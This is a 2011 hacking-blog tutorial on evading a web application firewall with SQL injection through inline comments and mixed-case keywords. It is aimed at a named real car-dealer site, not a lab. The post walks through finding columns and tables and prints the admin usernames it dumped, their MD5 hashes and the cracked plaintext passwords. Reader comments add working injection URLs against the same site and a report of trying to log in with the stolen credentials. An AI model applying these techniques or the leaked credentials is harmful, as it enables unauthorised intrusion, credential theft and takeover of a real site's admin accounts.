Friday, November 25, 2011

WAF bypass Using Sql Injection


Video Demonstartion

Hello Security Explorers , Welcome to Security Explored
This is the next tutorial in Sql Injection Series.
WAF Bypassing Through Sql Injection.
WAF stands for Web Application Firewall.
A web application firewall (WAF) is an appliance, server plugin, or filter that applies a set of rules to an HTTP conversation. Generally, these rules cover common attacks such as Cross-site Scripting (XSS) and SQL Injection. By customizing the rules to your application, many attacks can be identified and blocked. The effort to perform this customization can be significant and needs to be maintained as the application is modified.
Now We are Moving A step Forward in Sql Injection , Advanced SQL injection.
In this Tutorial , I hope that u know basic sql injection .
If  don’t then you should read my recent tutorial  With a video demonstration.
Read This tutorial first .
Now I have sql vulnerable site with WAF enabled.
To check for vulnerability ,
It shows an error
“You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' ORDER BY title ASC' at line 1”
Means it is vulnerable.
Now to find number of columns,
Means there are only 7 columns in the database.
Now the real thing starts,
Now to find vulnerable columns ,
On loading this URL we get this error
Not Acceptable
An appropriate representation of the requested resource /faq2.php could not be found on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.


This error is due to WAF , WAF is not allowing us to enter a malicious query ,it is blocking it .
Now to bypass WAF, we are going to use SQL inline comments like “ / ” , “ * ”  , “ ! ”.
We have to apply these comments on that things on which we want the server to focuss.
Now to bypass WAF and get vulnerable columns,we modify the syntax ,
Here you se we get all vulnerable columns.
Vulnerable columns are – 2,3,4,5,6
We are going to inject in these columns
You have noticed that I have used a sequence of capital and small alphabets in “union all select” ,Using this helps in WAF bypass.
Now to get MYSQL database version and current database .



You can get mysql version and current database at the same time by this
Next thing you all know to get Table names, for this,

We get these tables - 9791614_offers,C1on33_offers,apr,faq,newsletter,users

As I want to extract admin username and password, so I will use “users” table
In some sites you have to provide more inline comments to get table and columns names like,
/*!table_name*/ focuses on the query table_name  and give efficient results.
To get columns



Again in some site this will show a “Non Acceptable error” So you have to add more inline comments and your URL will be,

You will get these columns - id,headline,offer,price,contact,id,headline,offer,price,contact,apr,updated,id,title,p1,p2,p3,p4,updated,id,email,name,surname,address,phone,curr_car,year,id,username,password,email

Again I need username and password ,So the columns I am going to dump are “username” , ”password”
To dump them ,
Here we got this

SeanMcB:be5f032a39040e000b0cc2bf0887d496,Clon33M:83d385aa20740f16ca7fee506e37fc48

Here you see we have two admins
Here Username  are  SeanMcB  and Clon33M

be5f032a39040e000b0cc2bf0887d496   and  83d385aa20740f16ca7fee506e37fc48

are  md5 hash of the password , you need to decrypt them .
To decrypt  them go  to http://www.md5decrypter.co.uk
Paste your md5 hash their , enter the captcha code and click on decrypt hash .
The plain text of
be5f032a39040e000b0cc2bf0887d496 is  rZ23MHq
and of  83d385aa20740f16ca7fee506e37fc48 is Clon33


You get usernames and passwords
Now next thing is to find admin page
Again I will prefer you Havij to find admin pages .
Here in this cases admin page is
If you have any problem or any query then feel free to contact me at     cyberdash@live.in


6 comments:

  1. I tested it ,

    http://cloneemotorcentre.ie/faq2.php?id=-15/**/uNiOn/**/SelEct/**/1,2,3,4,5,6,7--

    can by pass it ....

    ReplyDelete
  2. @独自等待 yup you can bypass it ......u just need to provide inline comments in the syntax to bypass WAF

    ReplyDelete
  3. hi friends i have a hacking blogs for more tips and tricks


    www.indianhackersblog.blogspot.co.uk

    ReplyDelete
  4. we can just change a letter to capital for http://cloneemotorcentre.ie/faq2.php?id=-15%20uniOn%20all%20seLect%201,2,3,4,5,6,7--

    ReplyDelete
  5. I can't log in with admin's information. The site always says "Unknown column '83d385aa20740f16ca7fee506e37fc48' in 'where clause'"

    ReplyDelete